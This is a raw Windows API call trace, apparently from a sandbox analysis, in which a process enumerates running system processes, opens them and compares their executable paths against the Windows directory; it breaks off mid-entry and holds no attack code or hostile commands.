[0113.957] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0113.957] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x244) returned 0x0 [0113.957] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.957] GetCurrentProcessId () returned 0xf00 [0113.957] GetCurrentProcess () returned 0xffffffff [0113.957] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0113.957] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x2a4) returned 0x0 [0113.958] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0113.958] GetCurrentProcessId () returned 0xf00 [0113.958] GetCurrentProcess () returned 0xffffffff [0113.958] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0113.958] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0113.958] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0113.959] GetCurrentProcessId () returned 0xf00 [0113.959] GetCurrentProcess () returned 0xffffffff [0113.959] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0113.959] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x2b4) returned 0x0 [0113.959] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.959] GetCurrentProcessId () returned 0xf00 [0113.959] GetCurrentProcess () returned 0xffffffff [0113.959] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0113.960] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0113.960] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0113.960] GetCurrentProcessId () returned 0xf00 [0113.960] GetCurrentProcess () returned 0xffffffff [0113.960] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0113.960] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x370) returned 0x0 [0113.960] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5f, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.961] GetCurrentProcessId () returned 0xf00 [0113.961] GetCurrentProcess () returned 0xffffffff [0113.961] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0113.961] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x3ac) returned 0x0 [0113.961] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.961] GetCurrentProcessId () returned 0xf00 [0113.961] GetCurrentProcess () returned 0xffffffff [0113.961] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0113.961] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0 [0113.961] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.962] GetCurrentProcessId () returned 0xf00 [0113.962] GetCurrentProcess () returned 0xffffffff [0113.962] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0113.962] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x3d8) returned 0x0 [0113.962] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.963] GetCurrentProcessId () returned 0xf00 [0113.963] GetCurrentProcess () returned 0xffffffff [0113.963] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0113.963] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0113.963] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.969] GetCurrentProcessId () returned 0xf00 [0113.969] GetCurrentProcess () returned 0xffffffff [0113.969] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0113.969] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x350) returned 0x0 [0113.969] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.970] GetCurrentProcessId () returned 0xf00 [0113.970] GetCurrentProcess () returned 0xffffffff [0113.970] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0113.970] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x434) returned 0x0 [0113.970] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.971] GetCurrentProcessId () returned 0xf00 [0113.971] GetCurrentProcess () returned 0xffffffff [0113.971] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0113.971] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x554) returned 0x0 [0113.971] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.971] GetCurrentProcessId () returned 0xf00 [0113.971] GetCurrentProcess () returned 0xffffffff [0113.971] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0113.971] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x590) returned 0x0 [0113.971] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.972] GetCurrentProcessId () returned 0xf00 [0113.972] GetCurrentProcess () returned 0xffffffff [0113.972] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0113.972] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x598) returned 0x0 [0113.972] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.973] GetCurrentProcessId () returned 0xf00 [0113.973] GetCurrentProcess () returned 0xffffffff [0113.973] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0113.973] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x5b0) returned 0x0 [0113.973] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0113.973] GetCurrentProcessId () returned 0xf00 [0113.973] GetCurrentProcess () returned 0xffffffff [0113.973] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0113.973] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x5e8) returned 0x0 [0113.973] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.977] GetCurrentProcessId () returned 0xf00 [0113.977] GetCurrentProcess () returned 0xffffffff [0113.977] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0113.977] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x69c) returned 0x0 [0113.977] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0113.982] GetCurrentProcessId () returned 0xf00 [0113.982] GetCurrentProcess () returned 0xffffffff [0113.982] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0113.982] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x6bc) returned 0x0 [0113.982] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0113.983] GetCurrentProcessId () returned 0xf00 [0113.983] GetCurrentProcess () returned 0xffffffff [0113.983] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0113.983] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x708) returned 0x638 [0113.983] GetModuleFileNameExW (in: hProcess=0x638, hModule=0x0, lpFilename=0x7a9f5f8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\sihost.exe" (normalized: "c:\\windows\\system32\\sihost.exe")) returned 0x1e [0113.983] StrStrIW (lpFirst="C:\\Windows\\System32\\sihost.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\sihost.exe" [0113.983] CloseHandle (hObject=0x638) returned 1 [0113.983] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.984] GetCurrentProcessId () returned 0xf00 [0113.984] GetCurrentProcess () returned 0xffffffff [0113.984] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0113.984] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x720) returned 0x638 [0113.984] GetModuleFileNameExW (in: hProcess=0x638, hModule=0x0, lpFilename=0x7a9f5f8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")) returned 0x1f [0113.984] StrStrIW (lpFirst="C:\\Windows\\System32\\svchost.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\svchost.exe" [0113.984] CloseHandle (hObject=0x638) returned 1 [0113.984] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0113.985] GetCurrentProcessId () returned 0xf00 [0113.985] GetCurrentProcess () returned 0xffffffff [0113.985] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0113.985] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x7a0) returned 0x508 [0114.091] GetModuleFileNameExW (in: hProcess=0x508, hModule=0x0, lpFilename=0x7a9f5f8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\taskhostw.exe" (normalized: "c:\\windows\\system32\\taskhostw.exe")) returned 0x21 [0114.091] StrStrIW (lpFirst="C:\\Windows\\System32\\taskhostw.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\taskhostw.exe" [0114.091] CloseHandle (hObject=0x508) returned 1 [0114.091] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0114.091] GetCurrentProcessId () returned 0xf00 [0114.091] GetCurrentProcess () returned 0xffffffff [0114.091] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0114.092] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0114.092] GetCurrentProcessId () returned 0xf00 [0114.092] GetCurrentProcess () returned 0xffffffff [0114.092] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0114.092] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x818) returned 0x0 [0114.092] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0114.093] GetCurrentProcessId () returned 0xf00 [0114.093] GetCurrentProcess () returned 0xffffffff [0114.093] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0114.093] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x84c) returned 0x0 [0114.093] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0114.093] GetCurrentProcessId () returned 0xf00 [0114.093] GetCurrentProcess () returned 0xffffffff [0114.093] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0114.093] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x8a0) returned 0x0 [0114.093] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0114.094] GetCurrentProcessId () returned 0xf00 [0114.094] GetCurrentProcess () returned 0xffffffff [0114.094] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0114.094] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xb3c) returned 0x508 [0114.094] GetModuleFileNameExW (in: hProcess=0x508, hModule=0x0, lpFilename=0x7a9f5f8, nSize=0x104 | out: lpFilename="C:\\Windows\\SystemApps\\ShellExperienceHost_cw5n1h2txyewy\\ShellExperienceHost.exe" (normalized: "c:\\windows\\systemapps\\shellexperiencehost_cw5n1h2txyewy\\shellexperiencehost.exe")) returned 0x4f [0114.094] StrStrIW (lpFirst="C:\\Windows\\SystemApps\\ShellExperienceHost_cw5n1h2txyewy\\ShellExperienceHost.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\SystemApps\\ShellExperienceHost_cw5n1h2txyewy\\ShellExperienceHost.exe" [0114.094] CloseHandle (hObject=0x508) returned 1 [0114.094] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0114.095] GetCurrentProcessId () returned 0xf00 [0114.095] GetCurrentProcess () returned 0xffffffff [0114.095] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0114.095] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xb60) returned 0x508 [0114.095] GetModuleFileNameExW (in: hProcess=0x508, hModule=0x0, lpFilename=0x7a9f5f8, nSize=0x104 | out: lpFilename="C:\\Windows\\SystemApps\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SearchUI.exe" (normalized: "c:\\windows\\systemapps\\microsoft.windows.cortana_cw5n1h2txyewy\\searchui.exe")) returned 0x4a [0114.095] StrStrIW (lpFirst="C:\\Windows\\SystemApps\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SearchUI.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\SystemApps\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SearchUI.exe" [0114.095] CloseHandle (hObject=0x508) returned 1 [0114.095] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0114.096] GetCurrentProcessId () returned 0xf00 [0114.096] GetCurrentProcess () returned 0xffffffff [0114.096] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0114.096] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xbe4) returned 0x508 [0114.096] GetModuleFileNameExW (in: hProcess=0x508, hModule=0x0, lpFilename=0x7a9f5f8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\RuntimeBroker.exe" (normalized: "c:\\windows\\system32\\runtimebroker.exe")) returned 0x25 [0114.096] StrStrIW (lpFirst="C:\\Windows\\System32\\RuntimeBroker.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\RuntimeBroker.exe" [0114.096] CloseHandle (hObject=0x508) returned 1 [0114.096] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0114.097] GetCurrentProcessId () returned 0xf00 [0114.097] GetCurrentProcess () returned 0xffffffff [0114.097] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0114.097] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xe0c) returned 0x0 [0114.097] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0114.097] GetCurrentProcessId () returned 0xf00 [0114.097] GetCurrentProcess () returned 0xffffffff [0114.097] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0114.097] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1168) returned 0x0 [0114.097] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0114.098] GetCurrentProcessId () returned 0xf00 [0114.098] GetCurrentProcess () returned 0xffffffff [0114.098] NtQueryInformationProcess 